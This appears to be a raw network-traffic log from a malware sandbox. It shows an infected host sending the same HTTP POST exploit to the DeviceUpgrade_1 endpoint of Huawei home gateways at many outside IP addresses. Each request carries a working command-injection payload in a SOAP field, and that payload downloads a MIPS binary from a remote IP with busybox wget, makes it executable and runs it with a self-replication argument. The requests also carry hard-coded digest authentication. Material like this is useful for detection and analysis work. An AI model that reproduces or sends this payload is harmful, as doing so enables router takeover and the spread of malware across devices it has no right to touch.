                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1826192.168.2.2360658157.17.101.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586921930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1827192.168.2.235180841.182.161.13637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586977005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1828192.168.2.2360044197.58.196.2537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586988926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        May 28, 2024 08:59:11.638434887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1829192.168.2.2332850197.145.74.23437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586994886 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1830192.168.2.2348322157.113.103.21637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.587001085 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1831192.168.2.2351870131.247.227.20137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.587011099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1832192.168.2.2339834157.209.31.12037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.587102890 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1833192.168.2.2344694157.197.171.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.587129116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1834192.168.2.235946240.55.66.23137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.587896109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
